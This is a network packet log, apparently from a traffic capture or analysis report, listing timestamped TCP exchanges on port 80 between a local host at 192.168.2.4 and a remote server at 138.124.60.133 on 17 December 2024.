                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.934734106 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.935487032 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.935538054 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.935570955 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:34.935615063 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023360014 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023412943 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023529053 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023766041 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023797989 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023808956 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023833036 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.023870945 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.024780989 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.024867058 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.024867058 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.024915934 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.025516987 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.025594950 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084377050 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084433079 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084495068 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084775925 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084808111 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084821939 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084836006 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.084873915 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.085762024 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.085793018 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.085813046 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.085824966 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.086635113 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.086699963 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.086777925 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.086822987 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.087425947 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.087469101 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.087604046 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.087647915 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.088330030 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.088375092 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.088561058 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.088610888 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.089216948 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.117077112 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.117223978 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.117268085 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.118017912 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.118067026 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.118177891 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.118220091 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.119127989 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.119175911 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.119267941 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.119308949 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.120095015 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.120147943 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.120177031 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.120218039 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.120989084 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.121042967 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.121155977 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.121200085 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.121900082 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.121948004 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.122031927 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.122085094 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.122587919 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.122638941 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.122757912 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.122805119 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.123465061 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.123517036 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.123586893 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.123653889 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.124356031 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.124401093 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.124427080 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.124459982 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.125319958 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.125370979 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.125452995 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.125498056 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.126190901 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.126239061 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.126276016 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.126321077 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.126923084 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.126971960 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.126983881 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.127012968 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.127860069 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.127908945 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.128107071 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.128156900 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.128789902 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.128844976 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.128940105 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.128981113 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.215521097 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.215596914 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.215615988 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.215650082 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.215858936 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.215898991 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.215945959 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.215984106 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.216835976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.216877937 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.217019081 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.217058897 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.217582941 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.217624903 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.277596951 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.277615070 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.277712107 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.277894020 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.277940989 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.278074026 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.278114080 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.278856993 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.278867960 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.278902054 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.279742956 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.279788017 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.279927969 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.279968023 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.280560970 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.280601025 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.280729055 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.280769110 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.281469107 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.281513929 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.281652927 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.309113026 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.309175968 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.309269905 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.309312105 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.309885025 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.309940100 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.310029030 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.310076952 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.310832977 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.310909033 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.311139107 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.311192036 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.311887980 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.311904907 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.311969042 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.312689066 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.312700987 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.312741995 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.312769890 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.313453913 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.313503027 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.313610077 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.313656092 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.314426899 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.314534903 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.314590931 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.314644098 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.315382004 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.315444946 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.315557003 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.315604925 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.316363096 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.316421032 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.316519976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.316566944 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.317487955 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.317560911 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.317648888 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.317754984 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.318298101 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.318350077 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.318483114 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.318531036 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319123983 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319174051 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319308996 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319356918 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319838047 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319889069 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.319997072 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.320039988 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.320599079 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.320651054 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.320760012 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.320812941 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.408375978 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.408510923 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.408660889 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.408706903 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.408859968 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.408904076 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.409029007 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.409071922 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.410015106 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.410059929 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.410159111 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.410202980 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.410854101 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.410896063 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.469540119 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.469599009 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.469679117 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.469728947 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470024109 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470063925 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470221043 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470258951 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470417976 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470431089 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470454931 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470474958 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470822096 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.470866919 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.471007109 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.471044064 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.471707106 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.471750021 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.471791983 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.471827984 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.472624063 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.498368979 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.498975992 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.499011993 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.499066114 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.499111891 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.499864101 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.499917030 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.500050068 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.500087976 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.500991106 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501039028 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501080990 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501116037 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501648903 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501687050 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501780987 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.501816988 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.502559900 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.502598047 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.502693892 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.502732038 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.503479958 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.503520012 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.503530025 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.503563881 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.504276991 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.504312992 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.504375935 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.504415035 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.505139112 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.505191088 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.505218029 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.505251884 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.506061077 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.506113052 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.506134033 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.506169081 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.506921053 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.506966114 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.507076025 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.507116079 CET4973880192.168.2.4138.124.60.133
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.507817030 CET8049738138.124.60.133192.168.2.4
                                                                                                                                                                                                                                                  Dec 17, 2024 17:28:35.507863998 CET4973880192.168.2.4138.124.60.133
